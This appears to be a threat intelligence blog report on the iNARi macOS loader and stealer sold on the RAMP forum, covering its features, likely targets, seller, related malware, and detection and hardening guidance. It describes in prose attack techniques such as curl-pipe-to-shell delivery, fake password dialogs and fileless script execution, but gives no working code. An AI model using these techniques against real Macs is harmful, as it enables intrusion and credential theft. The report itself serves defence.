iNARi MacOS Loader – Threat Intelligence Report

Posted on

Introduction

A new malicious macOS loader and stealer dubbed “iNARi Loader” has emerged on cybercriminal forums in mid-April 2025 (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). First advertised on April 14, 2025 by a threat actor using the handle “patrick_star_dust” on the RAMP underground forum, iNARi is marketed as a “private” malware-as-a-service (MaaS) offering for macOS systems. It commands a high price and boasts an extensive feature set that represents a significant evolution in Mac malware capabilities (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). According to forum ads observed on the dark web, iNARi Loader combines remote desktop control with advanced data-stealing functionality, all while maintaining stealth and persistence on infected Macs (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). The following report provides a detailed analysis of iNARi’s technical features, potential targets, actor attribution, links to other malware, and guidance on indicators and detection.

1. Technical Breakdown of iNARi Loader Features

iNARi Loader is an advanced macOS malware with a modular architecture and multiple capabilities. Key features and capabilities include:

  • System Persistence: The malware is designed for persistent installation on macOS, ensuring it remains active even after reboots. While specific persistence mechanisms were not detailed in the forum post, macOS malware typically achieves persistence via Launch Agents/Daemons or login items. By establishing persistence, iNARi can maintain long-term access to an infected system for the attacker.
  • “Passwordless” Execution (Bypassing Prompts): One of iNARi’s most alarming capabilities is its ability to bypass macOS password prompts (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). In practice, this means the malware can perform privileged actions without requiring the user to enter their administrator password, thereby enabling “passwordless” execution of malicious payloads. This likely involves tricking the user into unknowingly authorizing the malware or exploiting a mechanism to avoid the prompt. Notably, this technique resembles methods used by previous macOS infostealers like Atomic Stealer, which employed fake system dialog boxes to capture user credentials (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). By bypassing or capturing the password prompt, iNARi can gain unrestricted access to sensitive data and system settings, effectively elevating privileges on the host.
  • Modular Architecture: iNARi is built as a modular platform, allowing attackers to deploy a range of malicious components or plugins as needed (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). According to the advertisement, the loader supports loading different payload modules dynamically. Confirmed modules include:
  • Stealth & Evasion: iNARi Loader is built with stealth in mind, such that it can evade detection by security software **without needing external obfuscation (cryptors)】. The seller claims it does not require use of crypting services to avoid antivirus detection, suggesting sophisticated built-in evasion techniques (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). This might include packing or runtime obfuscation, using legitimate-looking components, or fileless execution to stay undetected. By avoiding common malware signatures, iNARi can slip past macOS’s built-in protections and third-party AV solutions. (Notably, Apple’s native defenses like Gatekeeper, Notarization, and XProtect exist to block unsigned or known-malicious apps (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). iNARi’s distribution methods appear tailored to bypass these controls, as described below.)
  • Multiple Delivery Vectors: The malware can be delivered and executed on target Macs through multiple methods, increasing the success rate of infection (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). Advertised delivery vectors include:
    • Malicious Terminal Commands: Attackers can deliver iNARi via one-line Terminal commands or scripts. For example, a user might be tricked into running a curl | bash command or similar, which fetches and executes the loader directly. This “off-file” script-based approach (fileless installation) can bypass Gatekeeper since no app is launched – the code executes in memory via the Terminal/shell.
    • Trojanized Disk Images (.dmg): iNARi may be packaged inside a .dmg installer file. Users downloading pirated software or email attachments could run a DMG that installs iNARi in the background. Disk images are a common format for Mac software distribution, so a trojanized DMG can appear legitimate.
    • Malicious Package Installers (.pkg): Similarly, iNARi can be delivered as a .pkg installer (the macOS package format). A .pkg file might be presented as an application update or utility; if run, it could install the malware components onto the system.
    • Fake or Bundled Applications: The threat actor also mentions malicious applications as a vector (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). This implies iNARi might be hidden inside a fake app (for example, a repackaged legitimate app or a game/crack) that the user is persuaded to open. Once launched, the app would surreptitiously deploy the loader.
    • “Off-File” Scripts: The mention of off-file scripts suggests iNARi can execute through script-based mechanisms that do not leave an obvious file on disk. This might involve using macOS scripting tools (like osascript/AppleScript, Python, or command-line) to load the payload directly into memory. Fileless techniques further complicate detection, as traditional file-scanning may not catch the malware.
    By employing these varied delivery methods – from direct shell commands to disguised installers – iNARi maximizes the chances of infiltrating target systems (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). This multi-pronged approach means attackers can adapt the delivery to the scenario (phishing email, download site, physical access, etc.) and to the victim’s security posture.
  • Full System Access & Control: Once executed, iNARi Loader effectively gives attackers full control over the infected Mac. The combination of password prompt bypass and VNC remote desktop means the adversary can do almost anything a legitimate user could do on the system – and do so stealthily. For instance, they could silently install additional software, exfiltrate files, or even use the victim’s machine as a pivot point into connected networks. Researchers have noted this blending of data theft and remote control is a worrisome escalation for macOS threats (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). In essence, iNARi functions both as an infostealer and a RAT, allowing for persistent espionage or follow-on attacks after the initial infection.

Overall, iNARi’s technical feature set surpasses that of previous macOS malware seen in the wild (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). It represents a merger of capabilities (loader + stealer + remote access) in one platform, which until now have typically been found in separate malware. Security experts have flagged iNARi Loader as an advanced, high-threat tool due to these features, on par with the growing class of macOS-specific malware-as-a-service offerings (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).

2. Known/Suspected Victims and Targeting

As of this report, no specific victims of iNARi have been publicly identified. The malware was only recently advertised for sale (as of April 2025) and has not been openly reported in any incident, suggesting it is either newly deployed or still in limited/private use (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). However, we can infer likely targeting and victims based on iNARi’s nature and the threat landscape:

  • Victim Profile: Because iNARi is being sold as a high-priced MaaS, its clientele will likely be well-funded cybercriminals who in turn target high-value victims. The monthly subscription cost for iNARi is extremely steep – $5,000 USD/month for standard, and $10,000 USD/month for premium access (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News) – far above the prices of earlier Mac stealers like Atomic (which was ~$1k/month) (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). These prices indicate that the actors who purchase iNARi will seek significant returns on their investment. Likely targets include:
    • Financially Lucrative Individuals: Cryptocurrency holders, investors, or wealthy executives using Macs could be prime targets. MacOS is popular among tech entrepreneurs, finance professionals, and high-net-worth individuals – groups that present attractive financial targets for theft of crypto wallets, banking logins, or sensitive data.
    • Corporate Environments (Mac Users): Many businesses (especially in creative industries, technology, media, and marketing) deploy MacBooks for their staff. Threat actors might use iNARi to infiltrate such companies, either to steal proprietary information or to gain a foothold for further network compromise. The remote desktop feature would be particularly useful for an attacker attempting to manually explore a corporate victim’s machine or move laterally in a network.
    • Developers and Administrators: Technical users on macOS (developers, system admins) may have valuable credentials or access. Past Mac malware campaigns (e.g. targeting software developers) indicate interest in these users. iNARi could be employed in supply-chain attacks by first infecting a developer’s Mac, then trojanizing the apps they distribute.
  • Industries and Regions: There is no indication that iNARi is limited to a particular region – since it’s sold on a forum accessible to global criminals, it could be used against victims worldwide. However, given it originates from a likely Russian/English cybercrime forum, it is probable that Western countries (U.S., Europe) will be the main targets (many Russian-based threat actors avoid targeting CIS countries). Industries at risk include those with higher Mac usage: technology firms, design and media companies, universities (where students/faculty use Macs), and any enterprise with an executive who favors Mac. Essentially, any organization with macOS assets should consider itself a potential target, especially if they hold valuable data or funds.
  • Delivery Tactics: To actually reach these victims, attackers using iNARi would likely rely on social engineering and drive-by downloads. Because macOS has strong default security around app execution, the initial intrusion might involve tricking the user. Possible attack scenarios include:
    • Phishing Emails carrying a malicious DMG/PKG attachment or a link to one (disguised as a software update, document, or utility). The email lure could be tailored to Mac users (e.g. a fake Apple security update notification).
    • Malvertising and Fake Software Sites: We’ve seen macOS malware like Atomic spread via fake software websites and ads (for VPNs, media players, cracks, etc.). Similarly, iNARi could be dropped through rogue ads or search results luring users to download a trojanized app installer. Once the user runs the installer, iNARi would silently install in the background (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).
    • Forum or Torrent Distribution: Since many Mac users seek pirated software or uncommon apps on forums and torrents, an attacker might bundle iNARi with such downloads (for instance, a pirated Adobe software DMG that also installs the malware).
    • Terminal Social Engineering: Advanced attackers might convince targets to execute a Terminal command (for example, under the guise of tech support or a “configuration script”). Non-technical users can be fooled into running copy-pasted commands, which could directly fetch and execute iNARi in memory.

At this stage, iNARi appears to be in the hands of threat actors but not yet reported in any major breach or campaign. Security researchers and law enforcement are likely on the lookout for any incident involving macOS compromises with remote desktop access, which would be a hallmark of iNARi’s usage. Organizations in the aforementioned categories should proactively harden their Mac endpoints and educate users, anticipating that iNARi or similar malware may soon be deployed in the wild. The mere existence of iNARi Loader underscores that macOS users are now firmly in the crosshairs of sophisticated cybercriminal operations (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News).

3. Threat Actor ‘patrick_star_dust’ – Attribution and Background

The individual or group behind iNARi Loader uses the alias “patrick_star_dust” on the RAMP cybercrime forum (Ramp4u). This moniker appears to be a whimsical reference (combining the cartoon character Patrick Star with “stardust”) and does not directly reveal identity. Little is publicly known about this threat actor’s background, as this handle has not been prominently mentioned in prior threat reports before the iNARi advertisement. Key points on attribution and actor profile:

  • Forum Activity: patrick_star_dust is the forum user who created the thread offering iNARi Loader for sale. RAMP (Ramp4u) is a known underground forum where threat actors trade malware, exploits, stolen data, and access. It has a significant user base of Russian-speaking cybercriminals and ransomware affiliates. The presence of iNARi’s advertisement on RAMP suggests that the seller trusts this venue to reach serious buyers. It also implies the actor is somewhat established or at least vetted on that forum (since high-priced malware offerings often require reputation or forum escrow). It’s possible “patrick_star_dust” has been involved in previous dealings on RAMP or other forums under the same or different aliases, but no clear link has been made publicly.
  • Past Campaigns or Malware: As of now, there is no confirmed association between patrick_star_dust and earlier known Mac malware strains. iNARi appears to be introduced as a “private” tool not previously seen, rather than a rebrand of an existing malware (e.g., it is not simply Atomic Stealer being resold, but a distinct product). If patrick_star_dust had a history, it might be in developing or selling other malware or services. Some speculation can be made: the actor’s ability to develop a complex Mac malware suggests expertise in macOS internals and development (possibly a background in Mac software or a team with such skills). They may have tracked the success of earlier Mac stealers (like Atomic, Meta, Realst) and decided to enter this market with a more advanced offering. It is also possible that patrick_star_dust is connected to or funded by an existing cybercrime group that saw a need for a bespoke Mac tool. However, until more intelligence is gathered or if arrests/indictments occur, their true identity and affiliations remain unknown.
  • Motivation and Targeting: The actor is clearly financially motivated, given the MaaS rental model. By setting very high rental prices ($5k-$10k monthly), patrick_star_dust positions iNARi as an exclusive tool for top-tier criminals. This suggests confidence in the malware’s value. It also implies the actor is not targeting end victims directly (they are selling to other attackers), which is typical of malware developers. The patrack_star_dust actor likely profits from these subscriptions and possibly offers support or updates as part of the premium package (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). There is no evidence linking this actor to nation-state APT activity; the behavior (selling malware broadly on a forum) is more aligned with the cybercrime-as-a-business model.
  • Related Aliases: No alternate handles for patrick_star_dust are publicly documented yet. Sometimes, threat actors use different nicknames on different forums or switch names to avoid tracking. Researchers will be watching if the coding style or infrastructure of iNARi overlaps with any known malware author. For instance, if any code is shared with past Mac malware, that could hint at a known author. At present, iNARi seems to be a fresh creation, so patrick_star_dust could be a relatively new player in the malware dev scene, or a veteran operating under a new alias specifically for this product launch.
  • Reputation: Early chatter in the infosec community (for example, on social media) shows researchers taking iNARi seriously due to its features, but also a degree of caution – since until samples are obtained, claims in advertisements are taken with a grain of salt. If patrick_star_dust delivers on promises (i.e., iNARi works as advertised), their reputation among cybercriminal buyers will rise. RAMP forum feedback or vouches (if any) were not visible in open sources. If this actor successfully sells iNARi, we may see them continue to update the malware or even expand offerings (perhaps versions for Windows or mobile, although nothing like that is indicated yet).

In summary, ‘patrick_star_dust’ appears to be the developer or vendor of iNARi Loader, operating out of an underground forum to conduct sales. There is not enough data to tie this persona to known groups or past campaigns at this time. The situation is reminiscent of the introduction of the Atomic macOS stealer in early 2023, which was also sold by a new alias and later gained traction. It will be important to monitor this actor’s activities on dark web forums and any intelligence from law enforcement in order to learn more about their identity, partnerships, or potential customer base.

4. Connections to Other Malware and Broader Operations

The emergence of iNARi Loader is part of a broader trend of increasing macOS threats and appears to share some traits with other malware, though it also introduces new capabilities. Below are the notable connections and comparisons:

  • Evolution of macOS Infostealers: Over the last two years, macOS has seen a spike in infostealer malware-as-a-service. Notable examples include Atomic Stealer (AMOS), MetaStealer, PureLand, Realst (Real-Stealer), Cthulhu Stealer, Banshee, and others (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). These primarily focus on stealing data like passwords, cookies, crypto keys, etc. iNARi clearly belongs to this same category of threats but attempts to surpass earlier strains with a more comprehensive feature set (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). For instance, while Atomic Stealer could pilfer data and prompt for credentials, it did not have built-in remote desktop control. iNARi’s introduction signals that threat actors are iterating on each other’s designs – combining infostealers with RAT capabilities. We can see iNARi as an infostealer 2.0, building on the successes and techniques of its predecessors.
  • Technique Parallels (Atomic Stealer): One concrete connection is the method of bypassing or abusing password prompts. The iNARi seller explicitly notes the malware can bypass macOS authentication dialogs (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News), and likens it to prior malware like Atomic Stealer. Atomic, which emerged in 2023, famously presented fake system password prompts to users (e.g., a phony “System Preferences” dialog) to steal their password and then used it to unlock keychain or execute privileged actions (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News). iNARi likely employs a similar social-engineering trick or possibly an automation of approving security prompts. This is a clear case of a new malware building on known tactics from an older strain. The connection doesn’t necessarily mean the same authors – it could simply be tactic reuse. It does indicate that knowledge of Atomic Stealer’s approach influenced iNARi’s development.
  • Overlap with RATs and hVNC: By offering VNC-based remote desktop control, iNARi overlaps with the functionality of Remote Access Trojans. On Windows, malware like RevengeRAT, NetWire, and the concept of hVNC (hidden VNC) in banking trojans have provided similar remote control for years. On macOS, such capability has been rarer. One somewhat related malware was HZ macOS RAT (not widely known publicly, but referenced in some reports) which allowed full remote command execution (Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack). iNARi’s remote module could be seen as filling a similar niche for Mac: it potentially provides hidden remote access where the attacker can control the GUI without the user’s knowledge. This means iNARi might be used in scenarios beyond just stealing data – for example, an attacker could use the remote access to manually conduct fraud (if the victim is logged into banking), to install ransomware, or to propagandize (as seen when Windows RATs are used to deploy ransomware in networks). Thus, iNARi could be a tool in broader attack operations, such as a multi-stage breach where initial access is via iNARi, followed by hands-on-keyboard activity via its VNC, potentially leading to a larger compromise of an organization.
  • Potential Links to APT or Nation-State Tools: At this time, iNARi is being peddled in the criminal underground, so it’s primarily considered a crimeware tool. However, sophisticated nation-state actors (APTs) that target macOS might take interest in its capabilities. For instance, North Korea-linked groups have developed or used macOS malware (e.g., the RustBucket backdoor and KoiMiner/KoiStealer reported in 2023 (RustDoor and Koi Stealer for macOS Used by North Korea-Linked …) (Stealers on the Rise: A Closer Look at a Growing macOS Threat)). Those tools were custom to the APT’s campaigns. It’s unlikely an APT would purchase a tool like iNARi publicly, but they could certainly be inspired by it or might obtain it through covert means. One could draw a parallel: if an APT or spy agency wanted access to Mac targets, a capability like iNARi’s password bypass and remote desktop would be extremely useful. That said, no direct connection to any APT group has been observed. The more likely scenario is that financially motivated groups (e.g., those behind ransomware or large-scale fraud) use iNARi. For example, a ransomware affiliate crew that normally targets Windows networks might use iNARi to target an executive’s MacBook as an entry point to a company’s infrastructure.
  • Infection Campaigns & Affiliates: If iNARi gains popularity, it could become part of affiliate programs or bundled into malware kits. The way Atomic Stealer was used by multiple actors in separate phishing campaigns (disguised as different apps) may repeat with iNARi. We might see multiple distinct campaigns leveraging iNARi, not necessarily coordinated with each other, since any buyer can deploy it as they wish. Thus, iNARi isn’t an “operation” by itself; it’s a tool that can plug into various operations. It could appear in different guises – one campaign might deliver it as a fake crypto wallet app, another as a poisoned software update – all using the same core malware sold by patrick_star_dust. This complicates attribution of incidents, because even if two intrusions use iNARi, they might be carried out by different groups who simply bought the same tool.
  • Comparison with Other Recent Mac Malware: In the context of other recent threats:
    • Banshee Stealer (not widely documented publicly, but referenced) was another macOS stealer in 2024 with less capability, mainly focused on credential theft. It lacked the remote access that iNARi has.
    • MetaStealer/Python-based stealers often were simpler and spread via mass spam. iNARi, by contrast, appears more targeted due to its price and complexity.
    • Some macOS malware have been adaptations of Windows malware (for instance, the MetaStealer had some ties to RedLine code ported to Mac). iNARi so far does not show it’s a port of a Windows malware; it seems to be an original development for macOS.

In summary, iNARi Loader sits at the intersection of infostealer and RAT capabilities for macOS, marking a step-up in the criminal toolkit. It draws on techniques seen in prior Mac malware (like Atomic Stealer’s credential phishing (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News)) and extends them. Its presence for sale on forums fits into the broader cybercrime ecosystem, where MaaS offerings for Windows have long existed – now macOS is getting similar attention. Organizations should note that Mac endpoints can no longer be considered niche or safe by obscurity; tools like iNARi enable adversaries to include Macs in their attack campaigns with comparable ease and thoroughness as Windows machines. The trend is clear: macOS malware is on the rise, both in quantity and sophistication (macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News), and iNARi is a prime example of this evolution.

5. Indicators of Compromise, Detection, and Hunting Guidance

Detecting iNARi Loader can be challenging due to its stealth features, but defenders can look for both behavioral indicators and artifacts on systems. As of now, concrete IOCs (like hashes or C2 domains/IPs) for iNARi have not been publicly released, since samples have not been widely obtained. Organizations should monitor threat intelligence feeds for any emerging IOCs associated with iNARi. In the meantime, consider the following detection strategies and hunting tips:

  • Unusual Process Behavior: iNARi’s activities may manifest in system logs or EDR telemetry as abnormal process behavior. Key things to watch:
    • Terminal/Script Execution: If the infection is initiated via a Terminal command, you may see processes like bash, zsh, or curl spawning unexpectedly under a user context. For example, a user’s bash process executing a base64 blob or reaching out to the internet (to fetch a payload) is suspicious. Hunt for command-line histories or log entries that show one-liner commands fetching from URLs or performing obfuscated tasks.
    • New or Unknown Applications Launching: If delivered via a DMG/PKG, the user might launch what they think is a legitimate installer. This would appear as an unfamiliar process name. Pay attention to any unrecognized installer or app executions, especially if they prompt for accessibility or privacy permissions (as malware might try to get Accessibility access to control the system).
    • Privilege Escalation Attempts: Since iNARi can bypass password prompts, any process that would normally trigger an authorization dialog doing so without user input could leave traces. Look for log entries around SecurityAgent or authd where a password prompt event occurred but maybe was programmatically satisfied. Also, a malicious process might call AppleScript or other APIs to simulate clicks. Monitoring for processes using AppleScript (osascript) unexpectedly can be a clue.
  • Persistence Mechanisms: After initial run, iNARi would establish persistence. Common macOS persistence indicators include:
    • Launch Agents/Daemons: Check ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons for any newly created .plist files that load unusual executables or scripts on startup. iNARi might install a LaunchAgent for the current user or a LaunchDaemon for system-wide persistence. The plist name might be innocuous or random. If you find a plist referencing an unfamiliar binary in an odd location (like inside ~/Library/Application Support or /tmp), that’s suspect.
    • Login Items: In macOS (especially newer versions), malware might add itself as a login item. Use the system’s tmutil or log show to see if any login item additions occurred around the time of compromise.
    • Persistence through Profiles or Cron: Less likely, but check if any new configuration profiles were installed (which could grant the malware special rights), or any cron jobs/LaunchAgent that periodically fetches code.
  • Remote Access Indicators: The VNC-based remote desktop functionality may produce specific indicators:
    • Networking: VNC typically uses TCP port 5900. Even if iNARi uses a custom implementation, it may still rely on opening a port or socket for the attacker to connect. Monitor for any process listening on unusual ports, or any outgoing/incoming connections that coincide with user not being active. If the malware piggybacks on Apple’s built-in Screen Sharing service, you might see the screensharingd process running when it shouldn’t, or System Preferences -> Sharing being enabled unexpectedly.
    • User Interface Artifacts: Hidden VNC might not show obvious signs to the local user, but there could be subtle clues: the mouse cursor moving on its own, or applications opening briefly. These are anecdotal, but if a user reports “ghost” interactions, take it seriously as it could indicate remote control.
    • Logons at Odd Times: The attacker via VNC might create a hidden desktop session. Check system logs for user sessions or remote logins at strange times (especially if using VNC over SSH or similar, logs might show sessions opening).
  • Data Exfiltration and C2: Eventually, stolen data must leave the victim machine. iNARi likely communicates with a command-and-control (C2) server to upload stolen data or receive instructions (especially for modules). Hunt for:
    • Network Traffic Anomalies: Look for connections to IPs or domains that are not typical for the user’s pattern. Since iNARi is private, it might use a unique C2 domain. If known, block or monitor those. In absence of specific domains, look for traffic to hosting providers or cloud storage services at times that correlate with suspected malware activity. Large outbound transfers (if it’s uploading a lot of data) could be a sign.
    • Encrypted Traffic on Non-Standard Ports: If iNARi uses a custom protocol, it might not use standard ports. Any outbound connection from a user process on an uncommon port (other than 80/443/5223 etc.) should be investigated. Also, if using VNC, an encrypted VNC session might be detectable as a block of traffic at regular intervals.
    • Command and Control Patterns: If possible, use network sandboxing/detonation – if you have a quarantined sample – to identify its C2 infrastructure (this may not be feasible without a sample; for now, rely on intel sharing from the community on any discovered C2 addresses).
  • File System Artifacts: Even if iNARi strives to be fileless, some artifacts may be left:
    • Malware Binary or Scripts: Search for any binaries with unusual names or locations. The malware might install components in ~/Library/Application Support/<some folder> or a disguised system folder. If the name “inari” is used internally, a simple search for that string on disk or in memory could find something (attackers sometimes leave project names in strings). However, given its stealth, it may use generic names like “agentd” or mimic Apple processes to hide.
    • Logs of Execution: The macOS Unified Logs might record the execution of processes. Using Console or log show, filter for the timeframe of suspicion and look for any messages from unknown processes or crash reports (if the malware failed at some point). Crash logs of unknown apps can be a clue.
  • Endpoint Protection Alerts: Ensure that any available endpoint security tool on Macs (XProtect, MRT, or third-party AV/EDR) is updated. Apple’s XProtect (YARA-based signatures) might eventually get rules for iNARi once samples are obtained by Apple – keep macOS updated so you receive these silent XProtect updates. Some EDRs may generically detect behaviors like “suspicious script launches” or “attempt to access keychain” – these should be investigated, not dismissed, in the context of this new threat.
  • Threat Hunting Recommendations:
    To proactively hunt for iNARi or similar malware in your environment, consider the following:
    • YARA or Sigma Rules: Develop hunting YARA rules for Mac malware that searches for telltale strings in memory or files (for example, references to VNC functions, or usage of particular macOS APIs for credential prompts). Also, use Sigma rules for logs to detect things like a process enabling Accessibility API (which might be done to simulate keystrokes/mouse).
    • Monitor for New Services or Daemons: If iNARi installs a persistent service, macOS’s launchctl may list it. Periodically enumerate running LaunchAgents/Daemons and compare against a whitelist of known good services in your fleet.
    • User Reports: Encourage users to report any strange system behavior. Because macOS malware is still uncommon, users might notice odd signs (a sudden password prompt that disappears, unknown app in Applications folder, etc.). User reports can often lead to early detection.
    • Mac Forensics: If an endpoint is suspected of compromise, perform a forensic analysis. Dump the memory (if feasible) to search for any hooks or suspicious network sockets. Check the quarantine attributes on downloaded files (xattr on macOS files can show if a file was downloaded via browser and from where – e.g., see if a downloaded DMG that the user ran came from a sketchy URL). Analyze any suspicious installer with tools like Objective-See’s tools (KnockKnock, BlockBlock) to see what persistence it set up, or dyld inspection to see if any dynamic library hijacking occurred.
  • Indicators of Compromise (Preliminary):
    Since concrete IOCs are not available in public sources, the following are hypothetical or generic indicators related to iNARi’s described behavior:
    • Filenames or bundle names like “FinderFontsUpdater”, “macOSInstaller”, or other innocuous-sounding names that are not part of the default OS, appearing in LaunchAgents or running processes.
    • A persistent LaunchAgent plist containing a program argument referencing “/private/var/tmp” or another unusual path (malware often drops payloads in tmp or hidden directories).
    • Outbound connections to IP addresses with no domain name (raw IP C2) over high-numbered ports.
    • The presence of a VNC server process. If the attacker uses a standard VNC, a process like OSXvnc or vine-server could be present. If using Apple’s screen sharing, the screensharingd process might be running under a user context unexpectedly.
    • Any signs of Keychain access: look at ~/Library/Keychains/ – malware might attempt to directly read files here if they got the password. Unusual file access to keychain-db files could trigger securityd logs.
  • Mitigation and Defense: In addition to hunting and detection, now is the time to harden defenses:
    • Ensure all Mac endpoints have the latest OS updates (which improve built-in security).
    • Enforce the use of security features: Gatekeeper (don’t allow users to easily run apps from unidentified developers), System Integrity Protection (SIP) on (prevents even root from tampering certain locations), and FileVault (in case devices are stolen, though not directly relevant to remote malware). Apple’s protections like Gatekeeper and Notarization can be bypassed if users are tricked into running Terminal commands, so user training is key.
    • Deploy Mac-compatible endpoint protection that can catch known malicious behaviors (for example, tools that flag when an app tries to record the screen or keystrokes, or when it tries to persist itself).
    • Use network controls to egress filter traffic from Macs. If your Macs typically don’t need to talk to arbitrary IPs, consider restricting outgoing connections or at least monitoring them with an IDS/IPS for known malicious patterns.
    • Incorporate macOS threats into your incident response playbooks. Many organizations still primarily focus on Windows. Ensure your IR team knows how to acquire logs and triage a Mac system. iNARi’s arrival means the next incident could very well involve a Mac compromise.

In conclusion, iNARi Loader represents a potent new threat to macOS environments. Security teams should treat this as a wake-up call to expand monitoring and response to include Macs as first-class targets. While specific indicators will emerge as samples are analyzed, the combination of iNARi’s advertised features gives us enough to start hardening systems and watching for suspicious behaviors immediately. By staying vigilant and applying the above hunting techniques, defenders can improve their chances of detecting iNARi or similar malware before serious damage is done.

Sources: The information in this report is based on open-source intelligence and reporting from April 2025, including dark web forum postings and security research analyses
(macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News)
(Hakerzy wystawili na sprzedaż malware dla systemu MacOS. Ceny wahają się od 5 do 10 tys. USD za miesiąc – Kapitan Hack)

Related Posts